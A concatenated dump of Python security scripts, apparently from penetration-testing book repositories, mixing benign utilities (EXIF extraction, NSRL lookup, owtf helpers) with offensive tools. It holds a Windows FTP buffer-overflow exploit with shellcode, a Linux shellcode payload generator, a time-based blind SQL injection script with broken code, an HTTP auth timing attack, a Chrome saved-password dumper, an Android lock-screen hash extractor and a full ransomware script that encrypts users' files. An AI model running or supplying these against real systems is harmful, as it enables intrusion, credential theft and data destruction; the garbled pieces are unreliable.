'Exif Version', 'Height', 'Width', 'Flash', 'Scene Type']
image = Image.open(filename)
# Detects if the file is corrupt without decoding the data
image.verify()
# Descriptions and values of EXIF tags: http://www.exiv2.org/tags.html
exif = image._getexif()
tags = {}
tags['Path'] = filename
tags['Name'] = os.path.basename(filename)
tags['Size'] = processors.utility.convertSize(os.path.getsize(filename))
tags['Filesystem CTime'] = strftime('%m/%d/%Y %H:%M:%S', gmtime(os.path.getctime(filename)))
tags['Filesystem MTime'] = strftime('%m/%d/%Y %H:%M:%S', gmtime(os.path.getmtime(filename)))
if exif:
for tag in exif.keys():
if tag == 36864:
tags['Exif Version'] = exif[tag]
elif tag == 36867:
dt = datetime.strptime(exif[tag], '%Y:%m:%d %H:%M:%S')
tags['Original Date'] = dt.strftime('%m/%d/%Y %H:%M:%S')
elif tag == 36868:
dt = datetime.strptime(exif[tag], '%Y:%m:%d %H:%M:%S')
tags['Digitized Date'] = dt.strftime('%m/%d/%Y %H:%M:%S')
elif tag == 41990:
# Scene tags: http://www.awaresystems.be/imaging/tiff/tifftags/privateifd/exif/scenecapturetype.html
scenes = {0: 'Standard', 1: 'Landscape', 2: 'Portrait', 3: 'Night Scene'}
if exif[tag] in scenes:
tags['Scene Type'] = scenes[exif[tag]]
else:
pass
elif tag == 37385:
# Flash tags: http://www.awaresystems.be/imaging/tiff/tifftags/privateifd/exif/flash.html
flash = {0: 'Flash did not fire', 1: 'Flash fired', 5: 'Strobe return light not detected',
7: 'Strobe return light detected', 9: 'Flash fired, compulsory flash mode',
13: 'Flash fired, compulsory flash mode, return light not detected',
15: 'Flash fired, compulsory flash mode, return light detected',
16: 'Flash did not fire, compulsory flash mode', 24: 'Flash did not fire, auto mode',
25: 'Flash fired, auto mode', 29: 'Flash fired, auto mode, return light not detected',
31: 'Flash fired, auto mode, return light detected', 32: 'No flash function',
65: 'Flash fired, red-eye reduction mode',
69: 'Flash fired, red-eye reduction mode, return light not detected',
71: 'Flash fired, red-eye reduction mode, return light detected',
73: 'Flash fired, compulsory flash mode, red-eye reduction mode',
77: 'Flash fired, compulsory flash mode, red-eye reduction mode, return light not detected',
79: 'Flash fired, compulsory flash mode, red-eye reduction mode, return light detected',
89: 'Flash fired, auto mode, red-eye reduction mode',
93: 'Flash fired, auto mode, return light not detected, red-eye reduction mode',
95: 'Flash fired, auto mode, return light detected, red-eye reduction mode'}
if exif[tag] in flash:
tags['Flash'] = flash[exif[tag]]
elif tag == 271:
tags['Make'] = exif[tag]
elif tag == 272:
tags['Model'] = exif[tag]
elif tag == 305:
tags['Software'] = exif[tag]
elif tag == 40962:
tags['Width'] = exif[tag]
elif tag == 40963:
tags['Height'] = exif[tag]
elif tag == 34853:
for gps in exif[tag]:
if gps == 1:
tags['Latitude Reference'] = exif[tag][gps]
elif gps == 2:
tags['Latitude'] = dmsToDecimal(exif[tag][gps])
elif gps == 3:
tags['Longitude Reference'] = exif[tag][gps]
elif gps == 4:
tags['Longitude'] = dmsToDecimal(exif[tag][gps])
else:
pass
return tags, headers
# http://resources.arcgis.com/EN/HELP/MAIN/10.1/index.html#//003r00000005000000
def dmsToDecimal(dms):
"""
Converts GPS Degree Minute Seconds format to Decimal format.
:param dms: The GPS data in Degree Minute Seconds format.
:return: The decimal formatted GPS coordinate.
"""
deg, min, sec = [x[0] for x in dms]
if deg > 0:
return "{0:.5f}".format(deg + (min / 60.) + (sec / 3600000.))
else:
return "{0:.5f}".format(deg - (min / 60.) - (sec / 3600000.))
| 47.945313 | 117 | 0.562101 |
Python-Penetration-Testing-Cookbook | from scapy.all import *
host = 'www.dvwa.co.uk'
ip = socket.gethostbyname(host)
openp = []
filterdp = []
common_ports = { 21, 22, 23, 25, 53, 69, 80, 88, 109, 110,
123, 137, 138, 139, 143, 156, 161, 389, 443,
445, 500, 546, 547, 587, 660, 995, 993, 2086,
2087, 2082, 2083, 3306, 8443, 10000
}
def is_up(ip):
icmp = IP(dst=ip)/ICMP()
resp = sr1(icmp, timeout=10)
if resp == None:
return False
else:
return True
def probe_port(ip, port, result = 1):
src_port = RandShort()
try:
p = IP(dst=ip)/TCP(sport=src_port, dport=port, flags='FPU')
resp = sr1(p, timeout=2) # Sending packet
if str(type(resp)) == "<type 'NoneType'>":
result = 1
elif resp.haslayer(TCP):
if resp.getlayer(TCP).flags == 0x14:
result = 0
elif (int(resp.getlayer(ICMP).type)==3 and int(resp.getlayer(ICMP).code) in [1,2,3,9,10,13]):
result = 2
except Exception as e:
pass
return result
if __name__ == '__main__':
conf.verb = 0
if is_up(ip):
for port in common_ports:
print (port)
response = probe_port(ip, port)
if response == 1:
openp.append(port)
elif response == 2:
filterdp.append(port)
if len(openp) != 0:
print ("Possible Open or Filtered Ports:")
print (openp)
if len(filterdp) != 0:
print ("Possible Filtered Ports:")
print (filterdp)
if (len(openp) == 0) and (len(filterdp) == 0):
print ("Sorry, No open ports found.!!")
else:
print ("Host is Down")
| 26.873016 | 105 | 0.500285 |
cybersecurity-penetration-testing | import requests
times = []
answer = "Kicking off the attempt"
cookies = {'cookie name': 'Cookie value'}
payload = {'injection': '\'or sleep char_length(password);#', 'Submit': 'submit'}
req = requests.post(url, data=payload, cookies=cookies)
firstresponsetime = str(req.elapsed)
for x in range(1, firstresponsetime):
payload = {'injection': '\'or sleep(ord(substr(password, '+str(x)+', 1)));#', 'Submit': 'submit'}
req = requests.post('<target url>', data=payload, cookies=cookies)
responsetime = req.elapsed.total_seconds
a = chr(responsetime)
times.append(a)
answer = ''.join(times)
return answer
averagetimer(http://google.com) | 29.666667 | 98 | 0.696734 |
Penetration-Testing-with-Shellcode | #!/usr/bin/python
import socket
import sys
shellcode = "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x53\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x68\x6c\x6c\x42\x42\x88\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x75\x73\x65\x72\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x6f\x78\x41\x42\x88\x4c\x24\x03\x68\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x54\x50\xff\xd6\x83\xc4\x0c\x31\xd2\x31\xc9\x52\x68\x73\x67\x21\x21\x68\x6c\x65\x20\x6d\x68\x53\x61\x6d\x70\x8d\x14\x24\x51\x68\x68\x65\x72\x65\x68\x68\x69\x20\x54\x8d\x0c\x24\x31\xdb\x43\x53\x52\x51\x31\xdb\x53\xff\xd0\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\xd6\x31\xc9\x51\xff\xd0";
junk = 'A'*230
eip = '\x90\x06\xbe\x75'
nops = '\x90'*10
injection = junk+eip+nops+shellcode
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect = s.connect(('192.168.129.128',21))
s.recv(1024)
s.send('USER '+injection+'\r\n')
| 78.0625 | 983 | 0.734177 |
cybersecurity-penetration-testing | #!/usr/bin/python
import socket
NSRL_SERVER='127.0.0.1'
NSRL_PORT=9120
def nsrlquery(md5hashes):
"""Query the NSRL server and return a list of booleans.
Arguments:
md5hashes -- The list of MD5 hashes for the query.
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((NSRL_SERVER, NSRL_PORT))
try:
f = s.makefile('r')
s.sendall("version: 2.0\r\n")
response = f.readline();
if response.strip() != 'OK':
raise RuntimeError('NSRL handshake error')
query = 'query ' + ' '.join(md5hashes) + "\r\n"
s.sendall(query)
response = f.readline();
if response[:2] != 'OK':
raise RuntimeError('NSRL query error')
return [c=='1' for c in response[3:].strip()]
finally:
s.close()
| 21.131579 | 59 | 0.560714 |
hackipy | #!/usr/bin/python3
try:
print("[>] Importing required modules")
from utilities import is_root, nothing, get_ip_range, arp_scan, parse_responses, show_result
import argparse
except ModuleNotFoundError:
print("[!] Missing modules, Exiting...")
exit()
else:
print("[>] Modules Successfully imported")
print() # Just a line break
########################################################################
# User Defined Function
########################################################################
def get_arguments():
"""This function will get arguments from command line if there are any and return them to main function"""
parser = argparse.ArgumentParser(description="All arguments are optional")
parser.add_argument("-t", "--target", dest="ip",
help="IP or IP range to scan, all if not provided")
parser.add_argument("-s", "--silent", dest="mute",
help="Show less output", action="store_true")
options = parser.parse_args()
return options.ip, options.mute
########################################################################
# The main function
########################################################################
# Parsing the arguments
ip, mute = get_arguments()
# Checking for privileges
if is_root():
nothing()
else:
print("[!] Please run the script as root")
exit()
# Getting local IP range if IP is not provided and providing feedback
if not ip:
try:
ip = get_ip_range()
except TypeError:
print("[!] Can't get current network's IP range, Not connected to a network")
exit()
print(f"[>] IP (or IP Range) is set to {ip}") if not mute else nothing()
# Starting the scan
print() if not mute else nothing()
print(f"[+] Starting the scan") if not mute else nothing()
print() if not mute else nothing()
responses = arp_scan(ip, mute)
# Displaying the responses
print() if not mute else nothing()
if (responses):
show_result(responses, mute)
else:
print("[!] No response recieved!")
| 30.181818 | 110 | 0.564414 |
cybersecurity-penetration-testing | import binascii
import logging
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20160401'
__version__ = 0.01
def checkHeader(filename, headers, size):
"""
The checkHeader function reads a supplied size of the file and checks against known signatures to determine
the file type.
:param filename: The name of the file.
:param headers: A list of known file signatures for the file type(s).
:param size: The amount of data to read from the file for signature verification.
:return: Boolean, True if the signatures match; otherwise, False.
"""
with open(filename, 'rb') as infile:
header = infile.read(size)
hex_header = binascii.hexlify(header)
for signature in headers:
if hex_header == signature:
return True
else:
pass
logging.warn('The signature for {} ({}) does not match known signatures: {}'.format(
filename, hex_header, headers))
return False
def convertSize(size):
"""
The convertSize function converts an integer representing bytes into a human-readable format.
:param size: The size in bytes of a file
:return: The human-readable size.
"""
sizes = ['Bytes', 'KB', 'MB', 'GB', 'TB']
index = 0
while size > 1024:
size /= 1024.
index += 1
return '{:.2f} {}'.format(size, sizes[index])
| 30.840909 | 111 | 0.624286 |
cybersecurity-penetration-testing | #!/usr/bin/python
#
# Copyright (C) 2015 Michael Spreitzenbarth (research@spreitzenbarth.de)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os, sys, subprocess, binascii, struct
import sqlite3 as lite
def get_sha1hash(backup_dir):
# dumping the password/pin from the device
print "Dumping PIN/Password hash ..."
password = subprocess.Popen(['adb', 'pull', '/data/system/password.key', backup_dir],
stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
password.wait()
# cutting the HASH within password.key
sha1hash = open(backup_dir + '/password.key', 'r').readline()[:40]
print "HASH: \033[0;32m" + sha1hash + "\033[m"
return sha1hash
def get_salt(backup_dir):
# dumping the system DB containing the SALT
print "Dumping locksettings.db ..."
saltdb = subprocess.Popen(['adb', 'pull', '/data/system/locksettings.db', backup_dir],
stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
saltdb.wait()
saltdb2 = subprocess.Popen(['adb', 'pull', '/data/system/locksettings.db-wal', backup_dir],
stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
saltdb2.wait()
saltdb3 = subprocess.Popen(['adb', 'pull', '/data/system/locksettings.db-shm', backup_dir],
stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
saltdb3.wait()
# extract the SALT
con = lite.connect(backup_dir + '/locksettings.db')
cur = con.cursor()
cur.execute("SELECT value FROM locksettings WHERE name='lockscreen.password_salt'")
salt = cur.fetchone()[0]
con.close()
# convert SALT to Hex
returnedsalt = binascii.hexlify(struct.pack('>q', int(salt) ))
print "SALT: \033[0;32m" + returnedsalt + "\033[m"
return returnedsalt
def write_crack(salt, sha1hash, backup_dir):
crack = open(backup_dir + '/crack.hash', 'a+')
# write HASH and SALT to cracking file
hash_salt = sha1hash + ':' + salt
crack.write(hash_salt)
crack.close()
if __name__ == '__main__':
# check if device is connected and adb is running as root
if subprocess.Popen(['adb', 'get-state'], stdout=subprocess.PIPE).communicate(0)[0].split("\n")[0] == "unknown":
print "no device connected - exiting..."
sys.exit(2)
# starting to create the output directory and the crack file used for hashcat
backup_dir = sys.argv[1]
try:
os.stat(backup_dir)
except:
os.mkdir(backup_dir)
sha1hash = get_sha1hash(backup_dir)
salt = get_salt(backup_dir)
write_crack(salt, sha1hash, backup_dir)
print "crack.hash can now be used to feed hashcat"
print "\033[0;32m-> hashcat -a 3 -m 110 " + backup_dir + "/crack.hash -1 ?d ?1?1?1?1\033[m (just add ?1 for echt additional digit to crack)" | 35.178947 | 144 | 0.676077 |
owtf | """
AJAX testing
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "AJAX Plugin to assist manual testing"
def run(PluginInfo):
resource = get_resources("ExternalAJAX")
Content = plugin_helper.resource_linklist("Online Resources", resource)
return Content
| 22.785714 | 75 | 0.759036 |
cybersecurity-penetration-testing | #!/usr/bin/python
import requests
import datetime
import string
import sys
ALPHABET = string.printable
RETRIES = 1
def fetch(url, username, password):
a = datetime.datetime.now()
r = requests.get(url, auth=requests.auth.HTTPBasicAuth(username, password))
if r.status_code == 200:
return 0
b = datetime.datetime.now()
return (b - a).total_seconds()
def main(url, username):
pass_so_far = ''
while True:
print '\n[>] Password so far: "%s"\n' % pass_so_far
times = {}
avg_times = {}
for p in ALPHABET:
times[p] = []
avg_times[p] = 0.0
for i in range(RETRIES):
password = pass_so_far + p
t = fetch(url, username, password)
if t == 0:
print 'Password found: "%s"' % password
return
times[p].append(t)
avg_times[p] = sum(times[p]) / float(RETRIES)
if ord(p) > 32:
print '\tLetter: "%c" - time: %f' % (p, avg_times[p])
max_time = [0,0]
for letter, time_ in times.items():
if time_ > max_time[1]:
max_time[0] = letter
max_time[1] = time_
pass_so_far += max_time[0]
if __name__ == '__main__':
if len(sys.argv) < 3:
print 'usage: http-auth-timing.py <url> <username>'
main(sys.argv[1], sys.argv[2]) | 26.377358 | 79 | 0.496552 |
PenTesting | from hashlib import sha256
from re import subn
def hash(word):
word = subn('\r','',word)[0]
word = subn('\n','',word)[0]
m = sha256(word)
return {m.hexdigest():word}
| 19.444444 | 32 | 0.595628 |
Python-for-Offensive-PenTest | # Python For Offensive PenTest
# Installing win32crypt
# http://sourceforge.net/projects/pywin32/files/pywin32/Build%20219/
# Dumping Google Chrome Passwords
from os import getenv # To find out the Chrome SQL path which is >> C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Login Data
import sqlite3 # To read the Chrome SQLite DB
import win32crypt # High level library to call windows API CryptUnprotectData
from shutil import copyfile # To make a copy of the Chrome SQLite DB
# LOCALAPPDATA is a Windows Environment Variable which points to >>> C:\Users\{username}\AppData\Local
path = getenv("LOCALAPPDATA") + "\Google\Chrome\User Data\Default\Login Data"
# IF the target was logging into a site which has an entry into the DB, then sometimes reading the Chrome DB will return an error that the DB is locked
# OperationalError: database is locked
# The Workaround for this, is to make a copy the Login Data DB and pull data out of the copied DB
path2 = getenv("LOCALAPPDATA") + "\Google\Chrome\User Data\Default\Login2"
copyfile(path, path2)
# Connect to the copied Database
conn = sqlite3.connect(path2)
cursor = conn.cursor() # Create a Cursor object and call its execute() method to perform SQL commands like SELECT
# SELECT column_name,column_name FROM table_name
# SELECT action_url and username_value and password_value FROM table logins
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
# To retrieve data after executing a SELECT statement, we call fetchall() to get a list of the matching rows.
for raw in cursor.fetchall():
print raw[0] + '\n' + raw[1] # print the action_url (raw[0]) and print the username_value (raw[1])
password = win32crypt.CryptUnprotectData(raw[2])[1] # pass the encrypted Password to CryptUnprotectData API function to decrypt it
print password # print the password in clear text
conn.close()
| 39.4375 | 153 | 0.752577 |
cybersecurity-penetration-testing | from scapy.all import *
interface ='mon0'
probe_req = []
ap_name = raw_input("Please enter the AP name ")
def probesniff(fm):
if fm.haslayer(Dot11ProbeReq):
client_name = fm.info
if client_name == ap_name :
if fm.addr2 not in probe_req:
print "New Probe Request: ", client_name
print "MAC ", fm.addr2
probe_req.append(fm.addr2)
sniff(iface= interface,prn=probesniff)
| 25.2 | 48 | 0.681122 |
PenetrationTestingScripts | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : jeffzhang
# @Time : 18-5-14
# @File : parse_plugin.py
# @Desc : ""
import os
import re
from fuxi.views.lib.mongo_db import connectiondb, db_name_conf
from flask import Flask
app = Flask(__name__)
plugin_db = db_name_conf()['plugin_db']
def parse_plugin(plugin_filename):
name_pattern = re.compile(r'name\s*=\s*[\'\"\[](.*)[\'\"\]]')
author_pattern = re.compile(r'author\s*=\s*[\'\"\[](.*)[\'\"\]]')
date_pattern = re.compile(r'vulDate\s*=\s*[\'\"\[](.*)[\'\"\]]')
app_pattern = re.compile(r'appName\s*=\s*[\'\"\[](.*)[\'\"\]]')
type_pattern = re.compile(r'vulType\s*=\s*[\'\"\[](.*)[\'\"\]]')
version_pattern = re.compile(r'appVersion\s*=\s*[\'\"\[](.*)[\'\"\]]')
plugin_data = open(plugin_filename, 'r').read()
try:
plugin_name = name_pattern.findall(plugin_data)
plugin_author = author_pattern.findall(plugin_data)
plugin_date = date_pattern.findall(plugin_data)
plugin_app = app_pattern.findall(plugin_data)
plugin_type = type_pattern.findall(plugin_data)
plugin_version = version_pattern.findall(plugin_data)
plugin_info = {
"plugin_filename": plugin_filename,
"plugin_name": plugin_name[0],
"plugin_author": plugin_author[0],
"plugin_date": plugin_date[0],
"plugin_app": plugin_app[0],
"plugin_type": plugin_type[0],
"plugin_version": plugin_version[0],
}
return plugin_info
except Exception as e:
print(e)
pass
def local_install():
print("[*]Processing...")
connectiondb(plugin_db).drop()
path = os.getcwd() + '/pocsuite_plugin/'
files = os.listdir(path)
for file_name in files:
plugin_info = parse_plugin(path + file_name.strip())
if plugin_info is None:
pass
else:
db_insert = connectiondb(plugin_db).insert_one(plugin_info).inserted_id
print("[*]Processing Completed!")
if __name__ == "__main__":
local_install()
| 31.5625 | 83 | 0.56505 |
PenetrationTestingScripts | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : jeffzhang
# @Time : 18-5-21
# @File : get_title.py
# @Desc : ""
import requests
import re
class TitleParser:
def __init__(self, target):
self.target = target
self.title = ''
def parser_title(self):
try:
res = requests.get(self.target)
match = re.search('<title>(.*?)</title>', res.content)
if match:
self.title = match.group(1)
else:
self.title = 'None'
except Exception as e:
self.title = 'ERR_CONNECTION_REFUSED'
return self.title
def get_title(target, subdomain_id):
target_url = "http://" + target
result = {
"title": TitleParser(target_url).parser_title(),
"_id": subdomain_id
}
return result
| 21.837838 | 66 | 0.527251 |
owtf | """
owtf.managers.resource
~~~~~~~~~~~~~~~~~~~~~~
Provides helper functions for plugins to fetch resources.
"""
import logging
import os
from owtf.db.session import get_scoped_session
from owtf.managers.config import get_conf
from owtf.models.resource import Resource
from owtf.utils.file import FileOperations
from owtf.utils.strings import multi_replace
def get_raw_resources(session, resource_type):
"""Fetch raw resources filtered on type
:param resource_type: Resource type
:type resource_type: `str`
:return: List of raw resources
:rtype: `list`
"""
filter_query = session.query(Resource.resource_name, Resource.resource).filter_by(
resource_type=resource_type
)
# Sorting is necessary for working of ExtractURLs, since it must run after main command, so order is imp
sort_query = filter_query.order_by(Resource.id)
raw_resources = sort_query.all()
return raw_resources
def get_rsrc_replacement_dict(session):
"""Get the configuration update changes as a dict
:return:
:rtype:
"""
from owtf.managers.target import target_manager
from owtf.managers.config import config_handler
configuration = get_conf(session)
configuration.update(target_manager.get_target_config)
configuration.update(config_handler.get_replacement_dict)
configuration.update(config_handler.get_framework_config_dict) # for aux plugins
return configuration
def get_resources(resource_type):
"""Fetch resources filtered on type
:param resource_type: Resource type
:type resource_type: `str`
:return: List of resources
:rtype: `list`
"""
session = get_scoped_session()
replacement_dict = get_rsrc_replacement_dict(session)
raw_resources = get_raw_resources(session, resource_type)
resources = []
for name, resource in raw_resources:
resources.append([name, multi_replace(resource, replacement_dict)])
return resources
def get_raw_resource_list(session, resource_list):
"""Get raw resources as from a resource list
:param resource_list: List of resource types
:type resource_list: `list`
:return: List of raw resources
:rtype: `list`
"""
raw_resources = session.query(Resource.resource_name, Resource.resource).filter(
Resource.resource_type.in_(resource_list)
).all()
return raw_resources
def get_resource_list(session, resource_type_list):
"""Get list of resources from list of types
:param resource_type_list: List of resource types
:type resource_type_list: `list`
:return: List of resources
:rtype: `list`
"""
replacement_dict = get_rsrc_replacement_dict(session)
raw_resources = get_raw_resource_list(session, resource_type_list)
resources = []
for name, resource in raw_resources:
resources.append([name, multi_replace(resource, replacement_dict)])
return resources
def get_resources_from_file(resource_file):
"""Fetch resources for a file
:param resource_file: Path to the resource file
:type resource_file: `str`
:return: Resources as a set
:rtype: `set`
"""
resources = set()
config_file = FileOperations.open(
resource_file, "r"
).read().splitlines() # To remove stupid '\n' at the end
for line in config_file:
if line.startswith("#"):
continue # Skip comment lines
try:
type, name, resource = line.split("_____")
resources.add((type, name, resource))
except ValueError:
logging.info(
"ERROR: The delimiter is incorrect in this line at Resource File: %s",
str(line.split("_____")),
)
return resources
def load_resources_from_file(session, default, fallback):
"""Parses the resources config file and loads data into the DB
.. note::
This needs to be a list instead of a dictionary to preserve order in python < 2.7
:param file_path: Path to the resources config file
:type file_path: `str`
:return: None
:rtype: None
"""
file_path = default
logging.info("Loading resources from: %s..", default)
if not os.path.isfile(default): # check if the resource file exists
file_path = fallback
resources = get_resources_from_file(file_path)
# Delete all old resources which are not edited by user
# because we may have updated the resource
session.query(Resource).filter_by(dirty=False).delete()
for type, name, resource in resources:
session.add(Resource(resource_type=type, resource_name=name, resource=resource))
session.commit()
| 31.454545 | 108 | 0.677155 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python
# Payload generator
## Total payload length
payload_length = 424
## Amount of nops
nop_length = 100
## Controlled memory address to return to in Little Endian format
#0x7fffffffddc0
#0x7fffffffe120
#current 0x7fffffffdf80: 0xffffdfa0
#0x7fffffffdde0
#return_address = '\x20\xe1\xff\xff\xff\x7f\x00\x00'
#IT must be noted that return address is $rsp
#00007fffffffde30
#THis is the contents of the register r9 ,where teh shell code is placed ,its verified with edebugger.THis methos is importent for cases when we dont have access over source code of the application ,and its built on assumption that teh address of register r9 willnot change over consective runs as address randomization is disabled.If the address changes ,then ideally we should look for an instruction that says jmp r9
return_address = '\x30\xde\xff\xff\xff\x7f\x00\x00'
## Building the nop slide
nop_slide = "\x90" * nop_length
## Malicious code injection
buf = ""
buf += "\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05"
buf += "\xef\xff\xff\xff\x48\xbb\xfa\x6e\x99\x49\xdc\x75\xa8"
buf += "\x43\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += "\x90\x47\xc1\xd0\xb6\x77\xf7\x29\xfb\x30\x96\x4c\x94"
buf += "\xe2\xe0\xfa\xf8\x6e\x88\x15\xa3\x75\xa8\x42\xab\x26"
buf += "\x10\xaf\xb6\x65\xf2\x29\xd0\x36\x96\x4c\xb6\x76\xf6"
buf += "\x0b\x05\xa0\xf3\x68\x84\x7a\xad\x36\x0c\x04\xa2\x11"
buf += "\x45\x3d\x13\x6c\x98\x07\xf7\x66\xaf\x1d\xa8\x10\xb2"
buf += "\xe7\x7e\x1b\x8b\x3d\x21\xa5\xf5\x6b\x99\x49\xdc\x75"
buf += "\xa8\x43"
## Building the padding between buffer overflow start and return address
padding = 'B' * (payload_length - nop_length - len(buf))
#perfect
print nop_slide + buf + padding + return_address
| 41.121951 | 419 | 0.735805 |
owtf | """
ACTIVE Plugin for Generic Unauthenticated Web App Fuzzing via Arachni
This will perform a "low-hanging-fruit" pass on the web app for easy to find (tool-findable) vulns
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Active Vulnerability Scanning without credentials via Arachni"
def run(PluginInfo):
resource = get_resources("Arachni_Unauth")
return plugin_helper.CommandDump("Test Command", "Output", resource, PluginInfo, [])
| 33.066667 | 98 | 0.77451 |
Effective-Python-Penetration-Testing | import hmac
import hashlib
digest_maker = hmac.new('secret-key', '', hashlib.sha256)
f = open('sample-file.txt', 'rb')
try:
while True:
block = f.read(1024)
if not block:
break
digest_maker.update(block)
finally:
f.close()
digest = digest_maker.hexdigest()
print digest | 17.647059 | 57 | 0.620253 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import pyPdf
import optparse
from pyPdf import PdfFileReader
def printMeta(fileName):
pdfFile = PdfFileReader(file(fileName, 'rb'))
docInfo = pdfFile.getDocumentInfo()
print '[*] PDF MetaData For: ' + str(fileName)
for metaItem in docInfo:
print '[+] ' + metaItem + ':' + docInfo[metaItem]
def main():
parser = optparse.OptionParser('usage %prog "+\
"-F <PDF file name>')
parser.add_option('-F', dest='fileName', type='string',\
help='specify PDF file name')
(options, args) = parser.parse_args()
fileName = options.fileName
if fileName == None:
print parser.usage
exit(0)
else:
printMeta(fileName)
if __name__ == '__main__':
main()
| 22.363636 | 60 | 0.609091 |
Ethical-Hacking-Scripts | from cryptography.fernet import Fernet
import os, sys
class RansomWare:
def __init__(self):
self.f = b'QAYEFKLQT469LdHWIs4ZG7xKrDr8JRzMTwNFvoQFILg='
self.fernet = Fernet(self.f)
self.dirlist = []
self.file_list = []
input("[+] This Ransomware can seriously F up your computer(Encrypts personal files). ONLY PRESS ENTER IF YOU ARE OK WITH THIS HAPPENING.")
input("[+] ARE YOU SURE? THERE IS NO TURNING BACK.")
print("[+] Your loss :( .")
def get_file_name(self):
return sys.argv[0].replace('/',' ').replace("\\"," ").split()[len(sys.argv[0].replace('/',' ').replace("\\"," ").split())-1]
def get_filelist(self):
filelist = []
try:
for i in os.listdir():
if "." in i:
filelist.append(os.path.join(os.getcwd(), i))
except:
pass
return filelist
def get_dir_list(self):
dirlist = []
try:
for i in os.listdir():
if "." not in i:
dirlist.append(os.path.join(os.getcwd(), i))
except:
pass
return dirlist
def encrypt_file(self, filename):
working = False
try:
file = open(filename, "rb")
working = True
except:
pass
if working:
content = file.read()
file.close()
file = open(filename, "wb")
file.write(self.fernet.encrypt(content))
file.close()
else:
file.close()
def decrypt_file(self, filename):
working = False
try:
file = open(filename, "rb")
working = True
except:
passs
if working:
try:
content = file.read()
file.close()
decrypt_content = self.fernet.decrypt(content)
file = open(filename, "wb")
file.write(decrypt_content)
file.close()
except:
pass
else:
file.close()
def get_files(self):
if sys.platform == "win32":
os.chdir("C:/Users/")
else:
os.chdir("/Users/")
self.dirlist.extend(self.get_dir_list())
self.file_list.extend(self.get_filelist())
for i in self.dirlist:
try:
os.chdir(i)
self.file_list.extend(self.get_filelist())
self.dirlist.extend(self.get_dir_list())
except:
pass
def encrypt_files(self):
self.get_files()
for i in self.file_list:
try:
self.encrypt_file(i)
except:
pass
self.display_warning()
self.enter_enc_key()
def decrypt_files(self):
self.get_files()
for i in self.file_list:
try:
self.decrypt_file(i)
except:
pass
def display_warning(self):
print(f"""
===============================================================================================================================
__ __ _ ____ _____ _ _ _
\ \ / / ( ) | _ \ / ____| (_) | | |
\ \_/ /__ _ _|/__ _____ | |_) | ___ ___ _ __ | | ___ _ __ ___ _ __ _ __ ___ _ __ ___ _ ___ ___ __| | |
\ / _ \| | | | \ \ / / _ \ | _ < / _ \/ _ \\ '_ \ | | / _ \| '_ ` _ \| '_ \| '__/ _ \| '_ ` _ \| / __|/ _ \/ _` | |
| | (_) | |_| | \ V / __/ | |_) | __/ __/ | | | | |___| (_) | | | | | | |_) | | | (_) | | | | | | \__ \ __/ (_| |_|
|_|\___/ \__,_| \_/ \___| |____/ \___|\___|_| |_| \_____\___/|_| |_| |_| .__/|_| \___/|_| |_| |_|_|___/\___|\__,_(_)
| |
|_|
===============================================================================================================================
[+] You are a victim of RansomSquid!
[+] All of your files have been encrypted.
[+] DO NOT CLOSE THIS WINDOW AS ALL YOUR FILES WILL BE LOST IF YOU DO SO.""")
def enter_enc_key(self):
while True:
key = input("[+] Enter the Encryption Key to Decrypt all of the encrypted Files: ").encode()
if key == self.f:
print("[+] Decrypting your files.")
self.decrypt_files()
input("[+] Press Enter to Exit.")
break
else:
print("[+] Your Key Is Invalid!")
"""
Get rid of the hashtags if you have gone insane.
"""
#e = RansomWare()
#e.encrypt_files()
| 39.078125 | 148 | 0.358354 |
Python-Penetration-Testing-for-Developers | #!/usr/bin/env python
'''
Author: Christopher S. Duffy
Date: March 2015
Name: username_generator.py
Purpose: To generate a username list from the US Census Top 1000 surnames and other lists
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
